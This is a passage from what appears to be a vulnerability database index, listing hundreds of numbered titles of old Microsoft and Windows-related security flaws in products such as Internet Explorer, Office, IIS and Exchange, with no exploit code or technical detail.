Multiple Command Remote Overflow [29501] Microsoft Visual Studio Multiple ActiveX COM Object Remote Memory Corruption [29448] Microsoft PowerPoint Crafted File Unspecified Code Execution [29447] Microsoft PowerPoint Crafted PPT Data Record Code Execution [29446] Microsoft PowerPoint Crafted PPT Object Pointer Code Execution [29445] Microsoft Excel Crafted XLS COLINFO Record Arbitrary Code Execution [29444] Microsoft Excel Crafted Lotus 1-2-3 File Arbitrary Code Execution [29443] Microsoft Excel Crafted XLS DATETIME Record Arbitrary Code Execution [29442] Microsoft Word for Mac Crafted String Unspecified Code Execution [29441] Microsoft Word Crafted Mail Merge File Arbitrary Code Execution [29440] Microsoft Word memmove Integer Overflow [29431] Microsoft .NET Framework AutoPostBack Property Unspecified XSS [29430] Microsoft Office Malformed Smart Tag Arbitrary Code Execution [29429] Microsoft Office mso.dll Malformed Record Handling Arbitrary Code Execution [29428] Microsoft Office Malformed Chart Record Unspecified Arbitrary Code Execution [29427] Microsoft Office Crafted String Unspecified Arbitrary Code Execution [29426] Microsoft XML Core Services XSLT Processing Overflow [29425] Microsoft XML Core Services XMLHTTP ActiveX Control Server-side Redirect Information Disclosure [29412] Microsoft Terminal Server Explorer Error Arbitrary Code Execution [29347] Microsoft IE msoe.dll COM Object Instantiation Code Execution [29346] Microsoft IE chtskdic.dll COM Object Instantiation Code Execution [29345] Microsoft IE imskdic.dll COM Object Instantiation Code Execution [29259] Microsoft PowerPoint PPT Unspecified Arbitrary Code Execution [29143] Microsoft PowerPoint PPT Malformed BIFF File Arbitrary Command Execution [29129] Microsoft IE wininet.dll Content-Type DoS [28946] Microsoft IE Vector Markup Language (VML) Arbitrary Code Execution [28842] Microsoft IE daxctle.ocx KeyFrame() Method Overflow [28841] Microsoft IE daxctle.ocx Spline Function Call Overflow [28730] Microsoft Publisher PUB File Font Parsing Overflow [28726] Microsoft Works Malformed Lotus 1-2-3 Spreadsheet DoS [28725] Microsoft Works Malformed Excel Spreadsheet DoS [28724] Microsoft Works Malformed Excel Spreadsheet Overflow [28723] Microsoft Works Malformed Works Spreadsheet DoS [28627] Microsoft IE VBScript and Javascript Infinite Loop Stack Overflow [28614] Microsoft IE input/div Tag width Conflict DoS [28539] Microsoft Word 2000 Unspecified Code Execution [28538] Microsoft Excel Cell Comment Rebuild Arbitrary Code Execution [28537] Microsoft Excel Crafted SELECTION Record Arbitrary Code Execution [28536] Microsoft Excel SELECTION Record Memory Corruption Arbitrary Code Execution [28535] Microsoft Excel Crafted COLINFO Record Arbitrary Code Execution [28534] Microsoft Excel Crafted LABEL Record Arbitrary Code Execution [28533] Microsoft Excel Crafted FNGROUPCOUNT Value Arbitrary Code Execution [28532] Microsoft Excel Crafted BIFF Record Array Index Arbitrary Code Execution [28381] Microsoft IE ActiveX SaveFile Handling DoS [28376] Microsoft IE US-ASCII Character Set Filter Bypass XSS [28260] Microsoft IIS FrontPage Server Extensions (FPSE) shtml.exe Path Disclosure [28134] Windows NT FTP Server (WFTP) Server SIZE Command Remote Overflow [28132] Microsoft IE HTTP 1.1 URL Parsing Overflow [27922] Microsoft Virtual DOS Machine (VDM) Local Memory Disclosure [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure [27855] Microsoft IE document.getElementByID Crafted CSS Arbitrary Code Execution [27854] Microsoft IE Chained CSS Imports Memory Corruption [27853] Microsoft IE HTML Rendering Memory Corruption [27852] Microsoft IE Uninitialized COM Object Memory Corruption [27851] Microsoft IE Redirect Handling Cross-Domain Privilege Escalation [27850] Microsoft IE Cross Site Window Location Information Disclosure [27849] Microsoft Visual Basic Unspecified Document Handling Overflow [27842] Microsoft Management Console (MMC) HTML-embedded Resource XSS Arbitrary Command Execution [27685] IBM Informix Dynamic Server on Windows username Overflow [27533] Microsoft IE Orphan Object Property Access NULL Dereference [27532] Microsoft IE ADODB.Recordset SysFreeString Invalid Length [27530] Microsoft IE NDFXArtEffects Multiple Property Overflow [27507] Microsoft Excel Embedded Shockwave Flash Object Arbitrary Javascript Execution [27475] Microsoft IE Nested Objects Exception Handler Unspecified Memory Corruption [27373] Microsoft IE Native Function Iteration NULL Dereference [27372] Microsoft IE Forms Multiple Object ListWidth Property Overflow [27327] Microsoft PowerPoint PPT File Closure Memory Corruption [27326] Microsoft PowerPoint powerpnt.exe Unspecified Issue [27325] Microsoft PowerPoint mso.dll PPT Processing Unspecified Code Execution [27324] Microsoft PowerPoint mso.dll PPT Processing Arbitrary Code Execution [27232] Microsoft IE NMSA.ASFSourceMediaDescription dispValue Overflow [27231] Microsoft IE HTML Help COM Object Click Method NULL Dereference [27230] Microsoft IE CEnroll SysAllocStringLen Invalid Length [27153] Microsoft .NET Framework Crafted Request Access Restriction Bypass [27150] Microsoft Office MSO.DLL String Processing Overflow [27149] Microsoft Office Malformed Property Overflow Arbitrary Code Execution [27148] Microsoft Office File Processing Malformed String Arbitrary Code Execution [27147] Microsoft Office PNG Processing Unspecified Code Execution [27146] Microsoft Office GIFIMP32.FLT GIF Parsing Overflow [27112] Microsoft IE OVCtl NewDefaultItem Method NULL Dereference [27111] Microsoft IE OWC11.DataSourceControl getDataMemberName Method Overflow [27110] Microsoft IE WebViewFolderIcon setSlice Overflow [27109] Microsoft IE DXImageTransform.Microsoft.Gradient Multiple Property Overflow [27108] Microsoft IE MHTMLFile Multiple Property NULL Dereference [27087] Microsoft IIS SMTP Encapsulated SMTP Address Open Relay [27059] Microsoft IE FolderItem Object NULL Dereference [27057] Microsoft IE DXImageTransform.Microsoft.RevealTrans Transition Property NULL Dereference [27056] Microsoft IE TriEditDocument URL Property NULL Dereference [27055] Microsoft IE HtmlDlgSafeHelper fonts Property NULL Dereference [27053] Microsoft Excel Asian Language Style Option Overflow [27014] Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference [27013] Microsoft IE DirectAnimation.DAUserData Data Property NULL Dereference [26957] Microsoft IE File Share Traversal Arbitrary HTA Execution [26956] Microsoft IE object.documentElement.outerHTML Cross-site Information Disclosure [26955] Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length Issue [26921] Novell GroupWise Windows Client Arbitrary Email Access [26839] Microsoft IE DirectAnimation.StructuredGraphicsControl SourceURL NULL Dereference [26837] Microsoft IE Frameset inside Table NULL Dereference [26836] Microsoft IE OutlookExpress.AddressBook COM Object NULL Dereference [26835] Microsoft IE HTML Help COM Object Image Property Heap Overflow [26834] Microsoft IE ADODB.Recordset COM Object Filter Property NULL Dereference [26771] Webmin on Windows Crafted Backslash Request Traversal Arbitrary File Access [26686] Toshiba Bluetooth Stack for Windows TOSRFBD.SYS Remote Overflow DoS [26666] Microsoft Hyperlink Object Library hlink.dll Link Processing Overflow [26536] Adobe Reader for Windows Multiple Unspecified Issues [26527] Microsoft Excel Malformed URL String Handling Overflow [26446] Microsoft IE Multipart HTML File Save Memory Corruption [26445] Microsoft IE Modal Browser Window Address Bar Spoofing [26444] Microsoft IE DXImageTransform.Microsoft.Light ActiveX Arbitrary Code Execution [26443] Microsoft IE UTF-8 Encoded HTML Overflow [26442] Microsoft IE Wmm2fxa.dll DXImageTransform COM Object Memory Corruption [26441] Microsoft Exchange Server Outlook Web Access HTML Parsing Unspecified XSS [26435] Microsoft PowerPoint Malformed Record Arbitrary Code Execution [26434] Microsoft JScript Object Release Memory Corruption [26193] Microsoft NetMeeting Unspecified Remote DoS [26175] Microsoft Jet SQL Command Overflow NULL Dereference DoS [25635] Microsoft Word Unspecified Code Execution [25429] Novell Client for Windows DPRPC library (DPRPCW32.DLL) ndps_xdr_array Function Remote Overflow [25400] IBM WebSphere Application Server (WAS) on Windows Registry Cleartext Credential Disclosure [25338] Microsoft Exchange Collaboration Data Objects Crafted Email Code Execution [25073] Microsoft IE mhtml: Redirection Domain Restriction Bypass [25003] Microsoft Office mailto: Arbitrary File Access [24966] Microsoft IE object Tag Memory Corruption Arbitrary Code Execution [24918] Ethereal NetXray/Windows Sniffer File Code Overflow [24595] Microsoft Office Malformed BIFF Record Multiple File Format Processing DoS [24547] Microsoft IE HTML Parsing Unspecified Remote Code Execution [24546] Microsoft IE COM Object Instantiation Remote Code Execution [24545] Microsoft IE HTML Element Crafted Tag Arbitrary Code Execution [24544] Microsoft IE IOleClientSite Dynamic Object Script Execution [24543] Microsoft IE Navigation Method Cross-Domain Information Disclosure [24542] Microsoft IE Unspecified Address Bar Spoofing [24541] Microsoft IE Double Byte Character Set (DBCS) Parsing Overflow [24518] Microsoft FrontPage Server Extensions fpadmdll.dll Multiple Parameter XSS [24517] Microsoft Data Access Components RDS.Dataspace ActiveX Remote Code Execution [24490] Microsoft IE w/ Sun Java VM INPUT Focus DoS [24465] Microsoft IE Window Loading Race Condition Address Bar Spoofing [24318] Microsoft Fingerprint Reader Cleartext Credential Transmission [24208] Microsoft .NET Framework ILDASM Overflow [24207] Microsoft .NET Framework ILASM .il File Processing Overflow [24121] Microsoft Commerce Server 2002 authfiles/login.asp Authentication Bypass [24095] Microsoft IE Arbitrary HTA File Execution [24081] Microsoft Outlook 2003 Unspecified Malformed Word Attachment DoS [24050] Microsoft IE createTextRange() Function Arbitrary Code Execution [23964] Microsoft IE mshtml.dll Multiple Script Action Handler Overflow [23903] Microsoft Office Crafted Routing Slip Arbitrary Code Execution [23902] Microsoft Office Excel Malformed Record Arbitrary Code Execution [23901] Microsoft Office Excel Malformed Graphic Arbitrary Code Execution [23900] Microsoft Office Excel Malformed Description Arbitrary Code Execution [23899] Microsoft Office Excel BIFF File Processing Malformed BOOLERR Record Arbitrary Code Execution [23711] Microsoft Visual Studio .dbp File DataProject Field Buffer Overflow [23657] Microsoft IE ActiveX Killbit Setting Bypass [23609] Microsoft IE Crafted Elements Status Bar URL Spoofing [23608] Microsoft IE Iframe Folder Delete Weakness [23591] Microsoft Office Spreadsheet Component SaveAs Capability Arbitrary File Creation [23590] Microsoft IIS Traversal Arbitrary FPSE File Access [23588] Microsoft IE Self-referenced OBJECT Directive DoS [23572] M4 Project enigma-suite Windows Client Default Account [23569] HP System Management Homepage (SMH) on Windows Unspecified Traversal Arbitrary File Access [23542] lighttpd on Windows Crafted Filename Request Script Source Disclosure [23490] Microsoft IE Scripting Engine Thread Stack Exhaustion DoS [23484] Microsoft SQLServer 2000 sp_addalias Procedure Privileged Alias Creation [23307] Microsoft IE window.status Memory Leak DoS [23234] Microsoft SQLServer 2000 Unspecified Invalid Client Buffer DoS [23231] Microsoft SQL Server 2000 SQL Profiler Multiple Method DoS [23228] Microsoft Outlook Web Access .INC File Direct Request Source Disclosure [23205] Microsoft SQLServer 2000 Crafted Sort Command User Mode Scheduler (UMS) Bypass DoS [23203] Microsoft SQL Server 2000 Database Name Transact-SQL Statement Privilege Escalation [23202] Microsoft SQLServer 2000 sysmembers Virtual Table Query Overflow [23201] Microsoft SQL Server 2000 Dynamic Transact-SQL Statement Disclosure [23200] Microsoft SQLServer 2000 Encrypted Stored Procedure Dynamic Query Disclosure [23135] Microsoft PowerPoint Temporary Internet Files Information Disclosure [22977] Microsoft IE jscript.dll document.write() NULL Pointer DoS [22976] Microsoft IE Crafted WMF Header Size Arbitrary Code Execution [22948] Microsoft IE urlmon.dll BGSOUND Tag file Attribute Overflow DoS [22941] Microsoft HTML Help Workshop .hhp Parsing Overflow [22834] Microsoft Log Sink Class pkmcore.dll ActiveX Arbitrary File Manipulation [22824] Microsoft Excel xls Processing Malformed Page Size Name Null Dereference [22823] Microsoft Excel xls Processing Malformed Graphic Pointer NULL Pointer Dereference [22649] ELOG on Windows Entry Resubmission Overflow [22364] WinRAR for Windows Archive Filename Overflow [22356] Microsoft IE Unspecified NULL Dereference DoS (#2) [22355] Microsoft IE Unspecified NULL Dereference DoS (#1) [22354] Microsoft IE Malformed table datasrc Tag DoS [22351] Microsoft IE Modal Security Dialog Race Condition [22332] Microsoft Visual Studio UserControl Load Event Code Execution [22305] Microsoft Outlook/Exchange TNEF Decoding Arbitrary Code Execution [21907] Microsoft Office InfoPath 2003 Mshtml.dll Form Handling DoS [21805] Microsoft IIS Crafted URL Remote DoS [21763] Microsoft IE Embedded CLSID COM Object Arbitrary Code Execution [21762] Microsoft IE HTTPS Proxy Basic Authentication URL Cleartext Transmission [21761] Microsoft IE Keyboard Shortcut Processing Weakness [21760] Microsoft IE Suppressed Download Dialog Window Manipulation Weakness [21568] Microsoft Excel xls Processing msvcrt.memmove() Function Malformed Range Overflow [21562] Microsoft IE CSS Crafted p Element DoS [21537] Microsoft IIS Log File Permission Weakness Remote Modification [21532] Microsoft IE CSS @import Directive Cross Domain Information Disclosure [20886] Microsoft IE Unspecified Margin/Padding NULL Pointer Dereference DoS [20874] Microsoft IE clipboardData Object getData Method Content Disclosure [20500] Microsoft IE Restricted Zone Site Addition URI DoS [20464] GO-Global for Windows _USERSA_ Remote Overflow [20376] Microsoft IE with JRE mshtmled.dll Malformed frameset Tag DoS [20308] Skype for Windows Crafted VCARD Handling Overflow [20307] Skype for Windows Crafted callto/skype URL Overflow [20271] Microsoft IE settimeout Function Recursion DoS [20248] Microsoft IE Embedded Content Processing XSS [20241] Microsoft ISA Server Fragmented UDP Saturation DoS [20207] Microsoft IE Alphanumeric Password Character Recognition Issue [20199] Microsoft IE Image Saturation Handling DoS [20146] Microsoft IE PerfectNav Plugin Malformed URL DoS [20106] BEA WebLogic on Windows Registry Cleartext Password Disclosure [19905] Microsoft Collaboration Data Objects Remote Overflow [19876] Microsoft AntiSpyware Registry Extension Bypass [19806] Microsoft IE Crafted Double Backslash shell: URI DoS [19798] Microsoft IE for Mac Malformed BGSOUND Tag DoS [19796] Microsoft IE Malformed IFRAME File Source DoS [19662] Microsoft IE XMLHTTP HTTP Request Injection [19267] WRQ Reflection for Secure IT Windows Server Mixed Case Ruleset Bypass [19266] WRQ Reflection for Secure IT Windows Server Default Account Persistence [19265] WRQ Reflection for Secure IT Windows Server Host Private Key File Permission Weakness [19264] Microsoft Exchange Server 2003 Crafted IMAP4 Folder Listing Request DoS [19209] Rediff Bol Fetch.FetchContact.1 ActiveX Windows Address Book Disclosure [19093] Microsoft Design Tools msdds.dll COM Object Arbitrary Code Execution [19089] Microsoft IE Unspecified Remote Code Execution [19029] Microsoft IE Meta Refresh Parsing Weakness [19024] Microsoft IE Automatic MIME Detection Weakness [18926] Microsoft IIS SERVER_NAME Variable Spoofing Filter Bypass [18897] MySQL on Windows UDF Create Function Traversal Privilege Escalation [18822] Microsoft DirectX DirectShow QUARTZ.DLL AVI Processing Overflow [18703] Novell eDirectory iMonitor on Windows dhost.exe Unspecified Remote Overflow [18612] Microsoft IE Multiple COM Object Embedded CLSID Arbitrary Remote Code Execution [18611] Microsoft IE Web Folder Cross-Domain Code Execution [18610] Microsoft IE JPEG Rendering Memory Corruption Arbitrary Code Execution [18587] Gaim for Windows accounts.xml Cleartext Password Local Disclosure [18510] Microsoft IE AJAX Crafted Content-type Header DoS [18501] CA BrightStor ARCserve Backup Agent for Windows Long String Overflow [18484] Mozilla Firefox with Microsoft Office Shared Section Permission Weakness Information Disclosure [18461] Microsoft ActiveSync Client/Server Partnership ID Spoofing [18460] Microsoft ActiveSync Authentication Transmission Cleartext Disclosure [18459] Microsoft ActiveSync Sync Request Saturation DoS [18458] Microsoft ActiveSync Device Response Equipment ID Enumeration [18243] Microsoft Outlook MS-DOS Device Name Attachment DoS [18241] Microsoft Outlook Express begin Keyword Message Handling DoS [18173] MySQL on Windows USE Command MS-DOS Device Name DoS [18152] Microsoft IE Image File Handling Remote DoS [17944] Windows XP OEM Backdoor Administrator Account [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17829] Microsoft Office .doc Font Parsing Overflow [17707] Microsoft Front Page Malformed HTML Edit DoS [17680] Microsoft IE JVIEW javaprxy.dll Memory Manipulation Arbitrary Code Execution [17671] Microsoft Site Server viewcode.asp Information Disclosure [17670] Microsoft Site Server Multiple Sample Sites SQL Injection [17669] Microsoft Site Server cphost.dll Arbitrary Code Execution [17668] Microsoft Site Server cphost.dll Malformed File Upload Disk Consumption DoS [17667] Microsoft Site Server LDAP_Anonymous Account Cleartext Password Disclosure [17666] Microsoft Site Server formslogin.asp url Parameter XSS [17665] Microsoft Site Server Default.asp XSS [17664] Microsoft Site Server remind.asp Information Disclosure [17663] Microsoft Site Server auoconfig.asp Information Disclosure [17662] Microsoft Site Server VsPrAuoEd.asp Information Disclosure [17661] Microsoft Site Server VsLsLpRd.asp Information Disclosure [17660] Microsoft Site Server VsTmPr.asp Information Disclosure [17659] Microsoft Site Server vs.asp Information Disclosure [17658] Microsoft Site Server default.asp Information Disclosure [17657] Microsoft Site Server UserManager.asp Arbitrary LDAP Modification [17656] Microsoft Site Server GroupManager.asp Arbitrary LDAP Modification [17655] Microsoft Site Server DSN.asp Information Disclosure [17654] Microsoft Site Server driver.asp Information Disclosure [17653] Microsoft Site Server domain.asp Information Disclosure [17652] Microsoft Site Server findserver.asp Information Disclosure [17624] VERITAS Backup Exec Remote Agent for Windows CONNECT_CLIENT_AUTH Remote Overflow [17622] VERITAS Backup Exec for Windows Admin Plus Pack Option Remote Overflow [17389] Microsoft Outlook Crafted E-mail Subject Arbitrary System File Creation [17342] Microsoft ISA Server Basic Credentials Exposure [17334] Microsoft IE Script Code Obfuscation (Ghost) [17314] Microsoft IE XML Redirect Information Disclosure [17313] Microsoft IE PNG Image Processing Arbitrary Code Execution [17312] Microsoft ISA Server NetBIOS Predefined Filter Privilege Escalation [17311] Microsoft ISA Server Cache Poisoning Restriction Bypass [17310] Microsoft Agent Trusted Internet Content Spoofing (fireclicking) [17307] Microsoft Exchange Outlook Web Access HTML Email XSS [17306] Microsoft Outlook Express NNTP LIST Command Remote Overflow [17218] Microsoft IE Stack Overflow Saturation DoS [17217] Microsoft IE Embedded File Recursion DoS [17176] Microsoft IE msxml3.dll Malformed Ref href Link DoS [17159] Microsoft IE Malformed FTP URL DoS [17158] Microsoft IE Crafted BMP Size Setting DoS [17124] Microsoft IIS Malformed WebDAV Request DoS [17123] Microsoft IIS Multiple Unspecified Admin Pages XSS [17122] Microsoft IIS Permission Weakness .COM File Upload [17094] Microsoft IE window() Function Arbitrary Code Execution [17088] Microsoft AntiSpyware gsasDtServ.exe Path Subversion Privilege Escalation [17045] SunOS Openwindows psh xnews Privilege Escalation [17031] Microsoft ISA Server 2000 SecureNAT Traffic Saturation DoS [16895] IRIX ftpd Unspecified Windows Link DoS [16827] Microsoft WGA Multiple Method Validation Bypass [16814] Microsoft Word mcw File Processing Overflow [16813] Microsoft ASP.NET FileStream Method Nonexistent File Request Path Disclosure [16729] avast! Anti-Virus on Windows NT Unspecified Scanner Bypass [16342] Microsoft IE Cross Site Mouse Click Disclosure [16196] Microsoft ASP.NET __VIEWSTATE Functionality Replay Attack [16195] Microsoft ASP.NET __VIEWSTATE Functionality Nested Request DoS [16024] AbsoluteTelnet Windows Title Remote Overflow [15979] OpenWindows Mailtool Malformed Mail Attachment DoS [15879] APG Classmaster Workstation Windows SMB Share Access Restriction Bypass [15757] Microsoft SQL Server sa Account Default Null Password [15749] Microsoft IIS / Site Server code.asp Arbitrary File Access [15480] Microsoft Outlook From Header Comma Parsing Failure [15479] Microsoft XP SP1 explorer.exe Malformed GIF Processing DoS [15470] Microsoft Word Unspecified Overflow [15467] Microsoft Exchange Server SMTP Extended Verb X-LINK2STATE Remote Overflow [15466] Microsoft IE Content Advisor Overflow [15465] Microsoft IE DHTML Object Memory Corruption Code Execution [15464] Microsoft IE wininet.dll Long Hostname Heap Corruption Code Execution [15342] Microsoft IIS Persistent FTP Banner Information Disclosure [15329] Microsoft IE Malformed RSA Public Key SSL Detection Failure [15224] Microsoft IE External Caching Security Failure Arbitrary File Access [15223] Microsoft IE XHTML Formatted Comment User Confirmation Bypass [15222] Microsoft IE imagetoolbar Functionality Disable Pop Up Dereference DoS [15221] Microsoft IE Drag and Drop Zone Security Preference Bypass [15220] Microsoft IE showHelp() Function Cross Domain Code Execution [15219] Microsoft IE XML Object Arbitrary File Access [15218] Microsoft IE showHelp() Function Double Backslash Arbitrary .chm Execution [15217] Microsoft IE input Tag Rendering DoS [15216] Microsoft IE Dialog Box Cross Domain Arbitrary Program Execution [15187] Microsoft Jet Database msjet40.dll File Parsing Overflow [15110] Microsoft Outlook Connector for Lotus Domino Password Policy Bypass [14882] Microsoft Office InfoPath Manifest.xsf Information Disclosure [14801] Eudora 'Use Microsoft Viewer' Option IE Launch Arbitrary Code Execution [14793] Microsoft IE window.showHelp() HTML Help File Arbitrary Command Execution [14765] Windows NT FTP Server (WFTP) Pro Server MKD/XMKD Absolute Path DoS [14764] Windows NT FTP Server (WFTP) Pro Server Unterminated Long Command DoS [14763] Windows NT FTP Server (WFTP) Pro Server Multiple Command Local Overflow [14762] Windows NT FTP Server (WFTP) STAT Command File Transfer Path Disclosure [14761] Windows NT FTP Server (WFTP) REST Command Malformed File Write Handling Remote DoS [14663] Microsoft AntiSpyware cscript/wscript Filter Bypass [14617] Microsoft Exchange Server 2003 Folder Handling DoS [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14502] Microsoft Data Access Components RDS Data Stub Remote Overflow [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14478] Worldspan for Windows Gateway Res Manager Port 17990 Malformed Request DoS [14446] Microsoft Virtual Machine Java Applet Invalid Handle DoS [14445] Microsoft Virtual Machine XML Support Classes Inappropriate Methods [14430] Microsoft Commerce Server 2000 Profile Service Affected API Overflow [14396] Microsoft ISA DNS Intrusion Detection Filter DoS [14269] Windows NT FTP Server (WFTP) .lnk Traversal Arbitrary File Access [14229] Microsoft IIS asp.dll Scripting.FileSystemObject Malformed Program DoS [14150] Windows NT Inappropriate Registry Key Permissions [14149] Windows NT Inappropriate Registry Key Value [14068] Smarty Windows Installation File Permission Issue [14025] Microsoft IE Script Initiated Popup Title Bar Spoofing [13985] Microsoft IIS Malformed HTTP Request Log Entry Spoofing [13945] Windows NT FTP Server (WFTP) Floppy Drive CD Request DoS [13928] Microsoft ASP.NET HttpServerUtility.HtmlEncode Unicode Character Bypass [13927] Microsoft ASP.NET Request Validation Mechanism Bypass [13859] Windows NT FTP Server (WFTP) Pro Long CWD Command Remote Overflow [13857] Windows NT Drivers DbgPrint Function Debug Message Format String [13762] Microsoft 2000 Domain Controller Directory Service Restore Mode Blank Password [13761] Microsoft Exchange 2000 Malformed URL Request DoS [13760] Microsoft IIS Malformed URL Request DoS [13759] Microsoft IIS ISAPI .ASP Parser Script Tag LANGUAGE Argument Overflow [13634] Microsoft IIS Inetinfo.exe Malformed Long Mail File Name DoS [13621] Microsoft Outlook Web Access (OWA) owalogon.asp Redirection Account Enumeration [13608] Microsoft IE Drag-and-Drop Privilege Escalation [13607] Microsoft IE CDF Cross-Domain Code Execution [13606] Microsoft IE createControlRange() Function Heap Corruption [13605] Microsoft IE URL Decoding Zone Spoofing Code Execution [13604] Microsoft IE Drag-and-Drop File Injection [13594] Microsoft Office XP URL Overflow [13558] Microsoft IIS SSL Request Resource Exhaustion DoS [13510] Microsoft Index Server AllowedPaths Registry Key Index Path Disclosure [13507] Microsoft IIS showfile.asp FileSystemObject Arbitrary File Access [13483] Microsoft Site Server AdSamples SITE.CSC Information Disclosure [13482] Microsoft Network Monitor (Netmon) Protocol Parsing Remote Overflow [13479] Microsoft IIS for Far East Parsed Page Source Disclosure [13478] Microsoft MS01-014 / MS01-016 Patch Memory Leak DoS [13473] Microsoft IIS on FAT Partition Local ASP Source Disclosure [13472] Microsoft Services for Unix Telnet Service Memory Consumption DoS [13471] Microsoft Services for Unix NFS Service Memory Consumption DoS [13439] Microsoft IIS HTTP Request Malformed Content-Length Parsing Remote DoS [13436] Microsoft Exchange LDAP Filter Exceptional BER Encoding DoS [13433] Microsoft IIS WebDAV MKCOL Method Location Server Header Internal IP Disclosure [13432] Microsoft IIS WebDAV WRITE Location Server Header Internal IP Disclosure [13431] Microsoft IIS WebDAV Malformed PROPFIND Request Internal IP Disclosure [13430] Microsoft IIS aexp4.htr Password Policy Bypass [13429] Microsoft IIS aexp3.htr Password Policy Bypass [13428] Microsoft IIS aexp2b.htr Password Policy Bypass [13427] Microsoft IIS aexp2.htr Password Policy Bypass [13426] Microsoft IIS NTLM Authentication Request Parsing Remote Information Disclosure [13425] Microsoft .NET orderdetails.aspx OrderID Parameter Arbitrary Order Access [13418] Microsoft Virtual Machine Applet Tag Malformed CODEBASE Arbitrary File Access [13417] Microsoft Virtual Machine COM Object Arbitrary Code Execution [13412] Microsoft Virtual Machine user.dir Property Information Disclosure [13406] Microsoft BizTalk Server BizTalkHTTPReceive.dll ISAPI Overflow [13385] Microsoft IIS WebDAV Long PROPFIND/SEARCH Request DoS [13333] Mozilla Thunderbird Microsoft IE Default Javascript Handler [13325] Microsoft Network Monitor (Netmon) HTTP Protocol Parser Overflow [13258] Microsoft IE Excel File Address Bar Spoofing [13238] Microsoft PowerPoint Action Settings Allows Invocation of Default Browser [13133] Microsoft IE iframe Tag Malformed file Attribute DoS [13132] Microsoft IE %20 URL Spoofing [13040] Microsoft IE Javascript Load Local File Path Disclosure [12937] Microsoft Office Encrypted Document RC4 Implementation Weakness [12918] Microsoft IE Dynamic IFRAME Tag XP SP2 File Download Security Bypass [12862] Microsoft IE USER32.CharLowerA Exception DoS [12806] Microsoft DATA Access IPS DAV Component Remote Arbitrary Content Write [12709] Microsoft HTML Parser Malformed Javascript DoS [12698] Microsoft IE FTP Download Traversal Arbitrary Command Execution [12660] Microsoft IE with RealOne pnxr3260.dll Embed Tag Arbitrary Code Execution [12654] Windows NT getCanonicalPath Memory Corropuption DoS [12652] Microsoft Visual Basic for Applications (VBA) VBE.DLL and VBE6.DLL Long ID Overflow [12612] NetCat for Windows -e Option Overflow [12424] Microsoft IE DHTML Edit ActiveX Control execScript() XSS [12408] Cisco Unity With Microsoft Exchange Multiple Default Accounts [12375] Microsoft Word / Wordpad Font Converter Remote Overflow [12373] Microsoft Word / Wordpad Tables Converter Remote Overflow [12354] Symantec Windows LiveUpdate NetDetect Local Privilege Escalation [12342] Microsoft IE BASE/FORM Address Bar Spoofing [12313] Microsoft IE Cross-domain Browser Window Injection Content Spoofing [12300] Microsoft SharePoint Portal Server STSADM.log- Log Local User Credential Disclosure [12299] Microsoft IE FTP URL Arbitrary Command Injection [12277] Microsoft IE sysimage: Local File Existence Disclosure [12258] Microsoft W3Who ISAPI (w3who.dll) Query String Remote Overflow [12257] Microsoft W3Who ISAPI (w3who.dll) Error Message XSS [12256] Microsoft W3Who ISAPI (w3who.dll) HTTP Connection Header XSS [12206] Apple Safari Spoof Pop-Up Windows [12163] Microsoft IE Save Picture As File Extension Spoofing [12157] Windows Application GUI Masked Password Disclosure [11958] Microsoft Outlook 2003 Image Rendering Security Policy Bypass [11957] Microsoft Outlook Express Troubleshooting Feature SMTP Auth Credential Disclosure [11956] Microsoft Outlook/Express Message body NUL Character DoS [11955] Microsoft IE/Outlook URL FORM Status Bar Spoofing [11954] Microsoft Outlook Express .dbx Deleted E-mail Persistence [11953] Microsoft Outlook Express A HREF Link Overflow DoS [11952] Microsoft Outlook Express S/MIME CA Certificate Spoofing [11951] Microsoft IE/Outlook XML File Attachment Arbitrary Script Execution [11950] Microsoft Outlook Express MIME Header Manipulation File Extension Spoofing Weakness [11949] Microsoft IE/Outlook BGSOUND Tag Information Disclosure [11948] Microsoft IE/Outlook Express IFRAME Tag Parsing Remote DoS [11947] Microsoft IE/Outlook BGSOUND Tag Parsing Remote DoS [11946] Microsoft IE/Outlook Malformed XBM File DoS [11945] Microsoft Outlook 2002 IFRAME Tag Embedded URL [11944] Microsoft Outlook 2002 HREF Tag Embedded JavaScript Execution [11943] Microsoft Outlook Image Tag Cookie Setting Bypass [11942] Microsoft Outlook Express Email Forward Blocked Attachment Access [11941] Microsoft Outlook Express HTML Frame base64 Attachment Security Bypass [11940] Microsoft Outlook Blocked Attachment Access [11939] Microsoft Outlook Attachment Spoofed Content Type [11938] Microsoft Outlook Express Attachment Filename Overflow [11937] Microsoft Outlook 98 Hidden Drive Access [11935] Microsoft Multiple Mail Client Read/Delivery Receipt Tag DoS [11918] Microsoft IE execCommand() File Extension Spoofing [11914] Microsoft Virtual Machine JDBC API Remote Security Check Bypass [11912] Microsoft Virtual Machine JDBC Java Applet Arbitrary DLL Load [11878] Microsoft IE Crafted Path Arbitrary Cookie Overwrite [11742] Microsoft IE Multiple Slash Disabled Protocol/Resource Restriction Bypass [11712] Microsoft ISA Server 2000 H.323 Filter Overflow [11580] Microsoft IE res: URI Handler File Existence Disclosure [11492] Solaris OpenWindows sdtcm_convert Overflow [11455] Microsoft IIS / PWS DOS Filename Request Access Bypass [11452] Microsoft IIS Double Byte Code Arbitrary Source Disclosure [11424] Microsoft Outlook V1 Exchange Server Security Certificate Cleartext Transmission [11423] Microsoft Outlook Malformed Header DoS [11422] Microsoft Outlook Express S/MIME Parsing Routine Remote Overflow [11420] Microsoft Outlook WMP .wms File IFRAME Command Execution [11419] Microsoft Outlook Express Header Carriage Return Filter Bypass [11418] Microsoft Outlook Express text/plain MIME Content Embedded SCRIPT Tag Command Execution [11417] Microsoft Outlook/Express VCard Handler Remote Overflow [11416] Microsoft Outlook/Express Blank Header DoS [11415] Microsoft Outlook Express Forced POP3 Command Mode DoS [11409] Windows NT RRAS/RAS Client Persistent Password Caching [11395] F-Secure Anti-Virus for Microsoft Exchange Nested Password Protected Archives Bypass [11337] Microsoft IE FRAME/IFRAME/EMBED Tag Overflow [11277] Microsoft IIS SSL ISAPI Filter Cleartext Information Disclosure [11274] Microsoft IE &quot [11268] Microsoft Exchange Internet Mail Service AUTH/AUTHINFO Command DoS [11257] Microsoft IIS Malformed GET Request DoS [11222] Microsoft XP SP2 